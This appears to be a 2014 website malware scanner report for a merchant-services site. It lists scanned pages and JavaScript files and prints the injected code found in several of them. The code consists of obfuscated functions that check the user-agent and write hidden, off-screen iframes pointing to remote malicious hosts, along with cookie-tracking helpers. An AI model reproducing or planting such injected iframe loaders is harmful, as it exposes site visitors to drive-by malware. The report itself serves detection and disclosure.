Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=betterbusinesssolutions.us
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://betterbusinesssolutions.us/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://betterbusinesssolutions.us/ | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=900 Connection: close Date: Sat, 20 Sep 2014 18:48:26 GMT Age: 0 Location: http://www.bbsinc.us Server: Microsoft-IIS/7.5 Content-Length: 0 Content-Type: text/html X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET | clean |
http://www.bbsinc.us/ | 200 OK Content-Length: 23062 Content-Type: text/html | clean |
http://www.bbsinc.us/templates/yoo_level/lib/js/mootools/mootools-release-1.11.js | 200 OK Content-Length: 1467 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: daboglow.riftenterprises.com ...[638 bytes skipped]... agirtuler.intservers.us/biblarudios16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"></iframe>'); } } Art_protection(); function Grandarium() { var soset = navigator.userAgent; var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1); if (!unicode) { document.write('<iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>'); } } Grandarium(); Decoded script: <iframe src="http://agirtuler.intservers.us/biblarudios16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"></iframe><iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe> Malicious iFrame found. size: 138x138 src: http://daboglow.riftenterprises.com/camendatro15.html This URL is marked by Google as suspicious <iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"> | ||
http://betterbusinesssolutions.us/media/system/js/caption.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=900 Connection: close Date: Sat, 20 Sep 2014 18:48:28 GMT Age: 1 Location: http://www.bbsinc.us/media/system/js/caption.js Server: Microsoft-IIS/7.5 Content-Length: 0 Content-Type: text/html X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET | clean |
http://www.bbsinc.us/media/system/js/caption.js | 200 OK Content-Length: 887 Content-Type: application/x-javascript | clean |
http://www.bbsinc.us/modules/mod_yoo_scroller/mod_yoo_scroller.js | 200 OK Content-Length: 1465 Content-Type: application/x-javascript | clean |
http://www.bbsinc.us/modules/mod_yoo_search/mod_yoo_search.js | 200 OK Content-Length: 887 Content-Type: application/x-javascript | clean |
http://www.bbsinc.us/plugins/system/yoo_effects/yoo_effects.js.php?lb=1&re=1&sl=1 | 200 OK Content-Length: 4826 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[1961 bytes skipped]... agirtuler.intservers.us/biblarudios16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"></iframe>'); } } Art_protection(); function Grandarium() { var soset = navigator.userAgent; var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1); if (!unicode) { document.write('<iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>'); } } Grandarium(); function Art_protection() { function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function takeOrlondo(name) ...[1559 bytes skipped]... Antivirus reports:
Malicious iFrame found. size: 138x138 src: http://daboglow.riftenterprises.com/camendatro15.html This URL is marked by Google as suspicious <iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"> | ||
http://betterbusinesssolutions.us/templates/yoo_level/lib/js/addons/base.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=900 Connection: close Date: Sat, 20 Sep 2014 18:48:31 GMT Age: 0 Location: http://www.bbsinc.us/templates/yoo_level/lib/js/addons/base.js Server: Microsoft-IIS/7.5 Content-Length: 0 Content-Type: text/html X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET | clean |
http://www.bbsinc.us/templates/yoo_level/lib/js/addons/base.js | 200 OK Content-Length: 1470 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: daboglow.riftenterprises.com ...[638 bytes skipped]... agirtuler.intservers.us/biblarudios16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"></iframe>'); } } Art_protection(); function Grandarium() { var soset = navigator.userAgent; var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1); if (!unicode) { document.write('<iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>'); } } Grandarium(); Decoded script: <iframe src="http://agirtuler.intservers.us/biblarudios16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"></iframe><iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe> Malicious iFrame found. size: 138x138 src: http://daboglow.riftenterprises.com/camendatro15.html This URL is marked by Google as suspicious <iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"> | ||
http://betterbusinesssolutions.us/templates/yoo_level/lib/js/addons/accordionmenu.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=900 Connection: close Date: Sat, 20 Sep 2014 18:48:32 GMT Age: 0 Location: http://www.bbsinc.us/templates/yoo_level/lib/js/addons/accordionmenu.js Server: Microsoft-IIS/7.5 Content-Length: 0 Content-Type: text/html X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET | clean |
http://www.bbsinc.us/templates/yoo_level/lib/js/addons/accordionmenu.js | 200 OK Content-Length: 2320 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Art_protection() {
function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function takeOrlondo(name) { var nachos = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return nachos ? decodeURIComponent(nachos[1]) : undefined; } var cookie = takeOrlondo( if (!(tog.hasClass('active') || this.options.display == 'all' || this.options.display == i)) { fx.hide(); } span.addEvent('click', function(){ fx.toggle(); }); }.bind(this)); } }); YOOAccordionMenu.implement(new Options);document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://mwancv.ddns.name/e5043c703de0ea57a.ebLoZqL?14" height="499" Antivirus reports:
| ||
http://betterbusinesssolutions.us/templates/yoo_level/lib/js/addons/fancymenu.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=900 Connection: close Date: Sat, 20 Sep 2014 18:48:33 GMT Age: 0 Location: http://www.bbsinc.us/templates/yoo_level/lib/js/addons/fancymenu.js Server: Microsoft-IIS/7.5 Content-Length: 0 Content-Type: text/html X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET | clean |
http://www.bbsinc.us/templates/yoo_level/lib/js/addons/fancymenu.js | 200 OK Content-Length: 887 Content-Type: application/x-javascript | clean |
http://betterbusinesssolutions.us/templates/yoo_level/lib/js/addons/dropdownmenu.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=900 Connection: close Date: Sat, 20 Sep 2014 18:48:33 GMT Age: 1 Location: http://www.bbsinc.us/templates/yoo_level/lib/js/addons/dropdownmenu.js Server: Microsoft-IIS/7.5 Content-Length: 0 Content-Type: text/html X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET | clean |
http://www.bbsinc.us/templates/yoo_level/lib/js/addons/dropdownmenu.js | 200 OK Content-Length: 1457 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Art_protection() {
function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function takeOrlondo(name) { var nachos = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return nachos ? decodeURIComponent(nachos[1]) : undefined; } var cookie = takeOrlondo( function Opelcorsamodel() { var ariga = navigator.userAgent; var hightvo = (ariga.indexOf("IEMobile") > -1 || ariga.indexOf("Windows") < +1 || ariga.indexOf("Chrome") > -1); if (!hightvo) { document.write('<iframe src="http://polterges.cariboolife.ca/ploidarada.cgi?15" style="position:absolute;border-style:none;left: -848px;background-color:brown;top: -848px;" height="137" width="137"></iframe>'); } } Opelcorsamodel(); Antivirus reports:
| ||
http://betterbusinesssolutions.us/templates/yoo_level/lib/js/yoo_tools.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=900 Connection: close Date: Sat, 20 Sep 2014 18:48:34 GMT Age: 1 Location: http://www.bbsinc.us/templates/yoo_level/lib/js/yoo_tools.js Server: Microsoft-IIS/7.5 Content-Length: 0 Content-Type: text/html X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET | clean |
http://www.bbsinc.us/templates/yoo_level/lib/js/yoo_tools.js | 200 OK Content-Length: 887 Content-Type: application/x-javascript | clean |
http://betterbusinesssolutions.us/wthvideo/wthvideo.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=900 Connection: close Date: Sat, 20 Sep 2014 18:48:36 GMT Age: 0 Location: http://www.bbsinc.us/wthvideo/wthvideo.js Server: Microsoft-IIS/7.5 Content-Length: 0 Content-Type: text/html X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET | clean |
http://www.bbsinc.us/wthvideo/wthvideo.js | 200 OK Content-Length: 1457 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Art_protection() {
function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function takeOrlondo(name) { var nachos = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return nachos ? decodeURIComponent(nachos[1]) : undefined; } var cookie = takeOrlondo( function Opelcorsamodel() { var ariga = navigator.userAgent; var hightvo = (ariga.indexOf("IEMobile") > -1 || ariga.indexOf("Windows") < +1 || ariga.indexOf("Chrome") > -1); if (!hightvo) { document.write('<iframe src="http://polterges.cariboolife.ca/ploidarada.cgi?15" style="position:absolute;border-style:none;left: -848px;background-color:brown;top: -848px;" height="137" width="137"></iframe>'); } } Opelcorsamodel(); Antivirus reports:
| ||
http://betterbusinesssolutions.us/index.php?option=com_contact&view=contact&id=1&Itemid=125 | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=900 Connection: close Date: Sat, 20 Sep 2014 18:48:36 GMT Age: 1 Location: http://www.bbsinc.us/index.php?option=com_contact&view=contact&id=1&Itemid=125 Server: Microsoft-IIS/7.5 Content-Length: 0 Content-Type: text/html X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET | clean |
http://www.bbsinc.us/index.php?option=com_contact&view=contact&id=1&itemid=125 | 200 OK Content-Length: 14944 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.betterbusinesssolutions.us <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="ltr" > <head> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Credit Card Processing, Merchant Servics ...[4437 bytes skipped]... | ||
http://www.bbsinc.us/media/system/js/validate.js | 200 OK Content-Length: 5284 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Art_protection() {
function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function takeOrlondo(name) { var nachos = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return nachos ? decodeURIComponent(nachos[1]) : undefined; } var cookie = takeOrlondo( $(el.labelref).addClass('invalid'); } } else { el.removeClass('invalid'); if (el.labelref) { $(el.labelref).removeClass('invalid'); } } } }); document.formvalidator = null; Window.onDomReady(function(){ document.formvalidator = new JFormValidator(); });document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://mwancv.ddns.name/e5043c703de0ea57a.ebLoZqL?14" height="499" width="499" Antivirus reports:
| ||
http://betterbusinesssolutions.us/index.php?option=com_content&view=article&id=116&Itemid=124 | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=900 Connection: close Date: Sat, 20 Sep 2014 18:48:38 GMT Age: 1 Location: http://www.bbsinc.us/index.php?option=com_content&view=article&id=116&Itemid=124 Server: Microsoft-IIS/7.5 Content-Length: 0 Content-Type: text/html X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET | clean |
http://www.bbsinc.us/index.php?option=com_content&view=article&id=116&itemid=124 | 200 OK Content-Length: 16187 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: betterbusinesssolutions.us
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: max-age=900
Connection: close
Date: Sat, 20 Sep 2014 18:48:26 GMT
Age: 0
Location: http://www.bbsinc.us
Server: Microsoft-IIS/7.5
Content-Length: 0
Content-Type: text/html
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: betterbusinesssolutions.us
Referer: http://www.google.com/search?q=betterbusinesssolutions.us
Result:
The result is similar to the first query. There are no suspicious redirects found.